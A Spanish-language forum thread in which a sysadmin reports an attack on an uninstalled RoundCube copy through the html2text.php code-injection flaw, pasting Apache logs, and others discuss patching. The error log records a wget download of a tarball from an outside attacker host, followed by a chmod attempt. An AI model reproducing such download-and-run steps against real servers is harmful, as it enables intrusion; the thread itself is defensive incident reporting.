Cuidado con Roundcube! PHP Arbitrary Code Injection

Imagen de NEO

Forums: 

Qué tal amigos!

A ver les cuento...
Por ahí.... una maquinita (virtualizada gracias a Dios), en la que corrían servicios de squid y http únicamente.
Resulta que tiene sin instalar el super atractivo, pesado y exigente roundcubemail (solo copiado en el htdocs)
Hace un par de días me llamaron para indicar que se caía la página web de esa empresa, oh sorpresa el apache estaba muerto.
Bueno viendo los logs de http/error.conf veo mensajes como este:

[Wed Apr 01 06:33:42 2009] [error] [client 217.196.166.83] File does not exist: /var/www/html/rc
[Wed Apr 01 06:33:43 2009] [error] [client 217.196.166.83] File does not exist: /var/www/html/mss2
[Wed Apr 01 06:33:44 2009] [error] [client 217.196.166.83] File does not exist: /var/www/html/mail/bin
[Wed Apr 01 06:33:44 2009] [error] [client 217.196.166.83] File does not exist: /var/www/html/roundcubemail
sh: line 0: cd: /var/www/roundcube/bin: No such file or directory
--06:34:13-- http://setst.uv.ro/emech.tgz
Resolving setst.uv.ro... 64.111.212.68
Connecting to setst.uv.ro|64.111.212.68|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 257454 (251K) [application/x-tar]
Saving to: `emech.tgz'
0K .......... .......... .......... .......... .......... 19% 76.1K 3s
50K .......... .......... .......... .......... .......... 39% 85.3K 2s
100K .......... .......... .......... .......... .......... 59% 138K 1s
150K .......... .......... .......... .......... .......... 79% 100K 1s
200K .......... .......... .......... .......... .......... 99% 111K 0s
250K . 100% 115K=2.6s
06:34:17 (97.8 KB/s) - `emech.tgz' saved [257454/257454]
chmod: missing operand after `+x*'
Try `chmod --help' for more information.

Comparando las mismas horas con el log http/acces_log

217.196.166.83 - - [01/Apr/2009:06:33:19 -0500] "POST /mail/bin/html2text.php HTTP/1.0" 404 304 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2)"
217.196.166.83 - - [01/Apr/2009:06:33:19 -0500] "POST /roundcubemail/bin/html2text.php HTTP/1.0" 404 313 "-" "Mozilla/4.0 (compatible; MSIE7.0; Windows NT 5.1; InfoPath.2)"
217.196.166.83 - - [01/Apr/2009:06:33:20 -0500] "POST /roundcube/bin/html2text.php HTTP/1.0" 200 123 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2)"

Al parecer la PC estaba bajo ataque, tratando de aprovecharse de una vulnerabilidad del RoundCubeMail y de otros Webmails que poseean la herramienta html2text.php la cual permitiría ejecutar un código php a discreción del atacante según se muestra este url http://sofistic.net/advisories/0801

Pues bueno morealeja, no usar RoundCubeMail (aunque me parece que ya hay un parche), u otra herramienta web que posea el archivo html2text.php. Si les es necesario, entonces no dejar en los tipicos directorios tales como:
- webmail
- mail
- atmail
- roundcube
- rc
- web
Mejor ponerlo en otra carpeta para que el atacante no pueda intuir donde se encuentra el archivo antes mencionado.

Saludos
NEO

Pero

Imagen de iknaxio

Pero el problema va al parecer con versiones no estables:
[quote]Vulnerable Systems:
* Round Cube RoundCube Webmail 0.2-3 beta
* Round Cube RoundCube Webmail 0.2-1 alpha [/quote]
Igual es un descuido de los dueños del servidor una por usar software no maduro en producción y dos por nunca actualizarlo (el parche data desde diciembre del año pasado).
Pero lo malo es que esta situación es súper común.

"Transporta un puñado de tierra todos los días y construirás una montaña" - Confucio
floss.iknaxio.net

Hola iknaxio. De ley que es

Imagen de NEO

Hola iknaxio.
De ley que es un descuido, sobre todo porque ni estaba instalado o configurado :jawdrop:
Pero bueno, he estado buscando en google y veo que este archivo html2text hay en varios otros programas, no está demás buscarlo en el htdocs y ver si nuestro software está actualizado.
Si es común, a mi si me ha pasado que he estado intentando instalar algún software por ahí llamativo, lo he dejado a medias y me he olvidado luego pordían pasar estas cosas mas fácilmente de lo que uno cree

Saludos
NEO